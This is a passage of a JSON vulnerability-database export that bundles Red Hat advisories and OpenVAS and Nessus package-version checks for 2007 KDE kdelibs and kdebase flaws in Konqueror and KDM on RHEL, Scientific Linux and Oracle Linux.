exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4569", "CVE-2007-3820"], "description": "Oracle Linux Local Security Checks ELSA-2007-0905", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122654", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2007-0905", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2007-0905.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122654\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:50:21 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2007-0905\");\n script_tag(name:\"insight\", value:\"ELSA-2007-0905 - Moderate: kdebase security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2007-0905\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2007-0905.html\");\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4569\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"kdebase\", rpm:\"kdebase~3.5.4~15.el5.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kdebase-devel\", rpm:\"kdebase-devel~3.5.4~15.el5.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:L/AC:L/Au:S/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:19", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0242", "CVE-2007-0537", "CVE-2007-1308", "CVE-2007-1564", "CVE-2007-3820", "CVE-2007-4224"], "description": "The kdelibs package provides libraries for the K Desktop Environment (KDE).\r\n\r\nTwo cross-site-scripting flaws were found in the way Konqueror processes\r\ncertain HTML content. This could result in a malicious attacker presenting\r\nmisleading content to an unsuspecting user. (CVE-2007-0242, CVE-2007-0537)\r\n\r\nA flaw was found in KDE JavaScript implementation. A web page containing\r\nmalicious JavaScript code could cause Konqueror to crash. (CVE-2007-1308)\r\n\r\nA flaw was found in the way Konqueror handled certain FTP PASV commands.\r\nA malicious FTP server could use this flaw to perform a rudimentary\r\nport-scan of machines behind a user's firewall. (CVE-2007-1564)\r\n\r\nTwo Konqueror address spoofing flaws have been discovered. It was\r\npossible for a malicious website to cause the Konqueror address bar to\r\ndisplay information which could trick a user into believing they are at a \r\ndifferent website than they actually are. (CVE-2007-3820, CVE-2007-4224)\r\n\r\nUsers of KDE should upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T12:14:05", "published": "2007-10-08T04:00:00", "id": "RHSA-2007:0909", "href": "https://access.redhat.com/errata/RHSA-2007:0909", "type": "redhat", "title": "(RHSA-2007:0909) Moderate: kdelibs security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:23", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4569"], "description": "The kdebase packages provide the core applications for KDE, the K Desktop\r\nEnvironment. These core packages include Konqueror, the web browser and\r\nfile manager.\r\n\r\nThese updated packages address the following vulnerabilities:\r\n\r\nKees Huijgen found a flaw in the way KDM handled logins when autologin and\r\n\"shutdown with password\" were enabled. A local user would have been able\r\nto login via KDM as any user without requiring a password. (CVE-2007-4569)\r\n\r\nTwo Konqueror address spoofing flaws were discovered. A malicious web site\r\ncould spoof the Konqueror address bar, tricking a victim into believing the\r\npage was from a different site. (CVE-2007-3820, CVE-2007-4224)\r\n\r\nUsers of KDE should upgrade to these updated packages, which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T11:50:57", "published": "2007-10-08T04:00:00", "id": "RHSA-2007:0905", "href": "https://access.redhat.com/errata/RHSA-2007:0905", "type": "redhat", "title": "(RHSA-2007:0905) Moderate: kdebase security update", "cvss": {"score": 6.8, "vector": "AV:L/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T04:56:06", "description": "Updated kdelibs packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdelibs package provides libraries for the K Desktop Environment\n(KDE).\n\nTwo cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "edition": 27, "published": "2007-10-09T00:00:00", "title": "RHEL 4 / 5 : kdelibs (RHSA-2007:0909)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:kdelibs", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:4.5", "p-cpe:/a:redhat:enterprise_linux:kdelibs-devel", "p-cpe:/a:redhat:enterprise_linux:kdelibs-apidocs"], "id": "REDHAT-RHSA-2007-0909.NASL", "href": "https://www.tenable.com/plugins/nessus/26952", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0909. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26952);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:12\");\n\n script_cve_id(\"CVE-2007-0242\", \"CVE-2007-0537\", \"CVE-2007-1308\", \"CVE-2007-1564\", \"CVE-2007-3820\", \"CVE-2007-4224\");\n script_xref(name:\"RHSA\", value:\"2007:0909\");\n\n script_name(english:\"RHEL 4 / 5 : kdelibs (RHSA-2007:0909)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kdelibs packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdelibs package provides libraries for the K Desktop Environment\n(KDE).\n\nTwo cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-3820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0909\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected kdelibs, kdelibs-apidocs and / or kdelibs-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(59, 79, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0909\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"kdelibs-3.3.1-9.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kdelibs-devel-3.3.1-9.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"kdelibs-3.5.4-13.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kdelibs-apidocs-3.5.4-13.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kdelibs-apidocs-3.5.4-13.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kdelibs-apidocs-3.5.4-13.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kdelibs-devel-3.5.4-13.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-devel\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T05:32:49", "description": "Two cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)", "edition": 25, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : kdelibs on SL5.x, SL4.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "modified": "2021-01-02T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20071008_KDELIBS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60263", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60263);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/25 13:36:17\");\n\n script_cve_id(\"CVE-2007-0242\", \"CVE-2007-0537\", \"CVE-2007-1308\", \"CVE-2007-1564\", \"CVE-2007-3820\", \"CVE-2007-4224\");\n\n script_name(english:\"Scientific Linux Security Update : kdelibs on SL5.x, SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0710&L=scientific-linux-errata&T=0&P=778\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7627dbff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected kdelibs, kdelibs-apidocs and / or kdelibs-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(59, 79, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"kdelibs-3.3.1-9.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kdelibs-devel-3.3.1-9.el4\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"kdelibs-3.5.4-13.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kdelibs-apidocs-3.5.4-13.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"kdelibs-devel-3.5.4-13.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:35:22", "description": "From Red Hat Security Advisory 2007:0909 :\n\nUpdated kdelibs packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdelibs package provides libraries for the K Desktop Environment\n(KDE).\n\nTwo cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "edition": 25, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 / 5 : kdelibs (ELSA-2007-0909)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kdelibs-apidocs", "p-cpe:/a:oracle:linux:kdelibs-devel", "p-cpe:/a:oracle:linux:kdelibs", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:4"], "id": "ORACLELINUX_ELSA-2007-0909.NASL", "href": "https://www.tenable.com/plugins/nessus/67574", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0909 and \n# Oracle Linux Security Advisory ELSA-2007-0909 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67574);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/25 13:36:07\");\n\n script_cve_id(\"CVE-2007-0242\", \"CVE-2007-0537\", \"CVE-2007-1308\", \"CVE-2007-1564\", \"CVE-2007-3820\", \"CVE-2007-4224\");\n script_xref(name:\"RHSA\", value:\"2007:0909\");\n\n script_name(english:\"Oracle Linux 4 / 5 : kdelibs (ELSA-2007-0909)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0909 :\n\nUpdated kdelibs packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdelibs package provides libraries for the K Desktop Environment\n(KDE).\n\nTwo cross-site-scripting flaws were found in the way Konqueror\nprocesses certain HTML content. This could result in a malicious\nattacker presenting misleading content to an unsuspecting user.\n(CVE-2007-0242, CVE-2007-0537)\n\nA flaw was found in KDE JavaScript implementation. A web page\ncontaining malicious JavaScript code could cause Konqueror to crash.\n(CVE-2007-1308)\n\nA flaw was found in the way Konqueror handled certain FTP PASV\ncommands. A malicious FTP server could use this flaw to perform a\nrudimentary port-scan of machines behind a user's firewall.\n(CVE-2007-1564)\n\nTwo Konqueror address spoofing flaws have been discovered. It was\npossible for a malicious website to cause the Konqueror address bar to\ndisplay information which could trick a user into believing they are\nat a different website than they actually are. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-October/000356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-October/000357.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(59, 79, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4 / 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kdelibs-3.3.1-9.el4.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kdelibs-3.3.1-9.el4.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kdelibs-devel-3.3.1-9.el4.0.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kdelibs-devel-3.3.1-9.el4.0.1\")) flag++;\n\nif (rpm_check(release:\"EL5\", reference:\"kdelibs-3.5.4-13.el5.0.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"kdelibs-apidocs-3.5.4-13.el5.0.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"kdelibs-devel-3.5.4-13.el5.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:25:11", "description": "Updated kdelibs packages that resolve several security flaws are now\navailable for Red 